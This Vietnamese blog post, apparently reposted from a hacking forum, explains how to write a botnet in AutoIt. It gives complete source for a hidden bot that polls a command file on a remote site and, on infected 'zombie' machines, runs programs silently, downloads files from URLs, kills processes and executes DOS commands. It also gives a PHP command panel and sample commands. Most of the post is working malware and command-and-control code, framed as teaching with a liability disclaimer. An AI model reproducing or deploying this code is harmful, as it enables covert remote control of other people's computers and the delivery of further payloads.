Trao đổi với tôi

http://www.buidao.com

11/8/09

[Hacking] Viết botnet bằng AutoIT, Nguồn: EnHack

Như đã nói, bot này Jutoms viết ra với mục đích để các bạn hiểu cấu trúc của một con bot như thế nào sau cái video sử dụng bot của LlyKil.

Đặc điểm:
1. Không tự động sửa đổi hệ thống
2. Không có tính lây lan như virus
3. Nhận lệnh từ file txt đặt trên site chỉ định (thay vì thông qua IRC)
4. Từ điều 3 => có thể cho/không cho một số zombie có thể nhận chỉ thị từ Master.

Tính năng:
1. Thực thi các ứng dụng trên máy zombie ở chế độ background (ẩn) hoặc forceground (hiện).
2. Chỉ thị từ Master được gõ như trong Windows Console (CMD)
3. Có khả năng download file từ URL chỉ định tư về nơi chỉ định trên đĩa cứng
4. Stop/Kill ứng dụng bằng tên.

Đây là mã nguồn bằng AutoIT3
Anh em có thể test rồi viết hộ mình hướng dẫn sử dụng cấu trúc lệnh và cơ chế của nó nhé ! (IMG:http://xforce.enhack.net/images/smilies/yahoo/6.gif)

QUOTE
#NoTrayIcon
$txt = "http://enhack.net/direc.txt"

While (1)
GetDr()
ExCmd()
Sleep(3000)
WEnd

Func GetDr()
; Doc va phan tich chi thi
InetGet ($txt, @WindowsDir & "\direc.txt", 1, 0)
$fp = FileOpen(@WindowsDir & "\direc.txt", 0)
Global $con = FileReadLine($fp)
FileClose($fp)
FileDelete(@WindowsDir & "\direc.txt")
EndFunc

Func ExCmd()
; Phan tich va thuc hien lenh
If StringInStr($con, "RUN#", 2) Then
$cmd = StringSplit($con, "#")
If StringInStr($con, "#SHOW", 2) Then
Run($cmd[2])
Else
Run($cmd[2], "", @SW_HIDE)
EndIf
Sleep(7000)
ElseIf StringInStr($con, "LOAD#", 2) Then
$cmd = StringSplit($con, " ")
InetGet ($cmd[2], $cmd[3], 0, 1)
Sleep(7000)
ElseIf StringInStr($con, "KILL#", 2) Then
$cmd = StringSplit($con, "#")
Run("TASKKILL /F /IM " & $cmd[2] & ".exe", "", @SW_HIDE)
Sleep(7000)
EndIf
EndFunc


Và cái này quan trọng nè :

Jutoms và EHS không chịu bất kì trách nhiệm nào nếu các bạn sử dụng mã nguồn bot trên với bất kì mục đích phá hoại nào.

Đây là mã nguồn file cmd.php để gõ command cho Bot

HTML
<html>
<head>
<title>EBoT Commander</title>
</head>
<body style='color:#00FF00; background-color: black'>
<br>
<form action=# method=POST>
<input type=text name=cmd size=80>
<input type=submit value=Command>
</form>
<br>
</body>
</html>
<?php
$cmd = $_POST['cmd'];
$fp = fopen('direc.txt', 'w');
fwrite($fp, $cmd);
fclose($fp);
echo $cmd;
?>



Một số lệnh mẫu (không phân biệt chữ hoa/thường)
Chú ý: sau khi gõ một lệnh và enter, chờ khoảng 10s sau bấm enter lần nữa để xóa lệnh, không thì bot cứ thế mà làm sẽ ì máy zombie


Mở Registry Editor chế độ hiện, nếu chạy ẩn thì bỏ #show
QUOTE
RUN#regedit #show
Tắt một ứng dụng, vd như YahooMessenger
QUOTE
KILL#YahooMessenger
Download hxxp://enhack.net/avatar.png về C:\avatar.png
QUOTE
LOAD# hxxp://enhack.net/avatar.png c:\avatar.png



Bổ sung code mới, thông minh hơn con trên xíu (IMG:http://xforce.enhack.net/images/smilies/yahoo/1.gif)
Thiết kế cho việc dùng Cellfone có GPRS remote console nên tối giản mã lệnh và sẽ bổ sung những mã lệnh mới để thay thế những mã lệnh dài nếu cần thiết.


QUOTE
#include
#include
#NoTrayIcon

$txt = "http://enhack.net/direc.txt"
$key = ""

While (1)
$con = _INetGetSource($txt)
If $key <> $con Then
; Phan tich va thuc hien lenh
If StringInStr($con, "#", 2) Then
$cmd = StringSplit($con, "#")
If StringInStr($con, "@#", 2) Then
Run($cmd[2], "", @SW_HIDE)
Else
Run($cmd[2])
EndIf
ElseIf StringInStr($con, "$", 2) Then
$cmd = StringSplit($con, "$")
_RunDOS($cmd[2])
ElseIf StringInStr($con, "!", 2) Then
$cmd = StringSplit($con, " ")
InetGet ($cmd[2], $cmd[3], 0, 1)
ElseIf StringInStr($con, "~", 2) Then
$cmd = StringSplit($con, "~")
Run("TASKKILL /F /IM " & $cmd[2] & ".exe", "", @SW_HIDE)
EndIf
$key = $con
EndIf
Sleep(5000)
WEnd


QUOTE
RUN# lão rút con "#",
LOAD# rút còn "!"
KILL# rút còn "~"
và run lệnh DOS thì "$"
và "@#" để chạy nền vì mặc định "#" là show

Link: http://www.angiangonline.net/diendan/index.php?showtopic=1158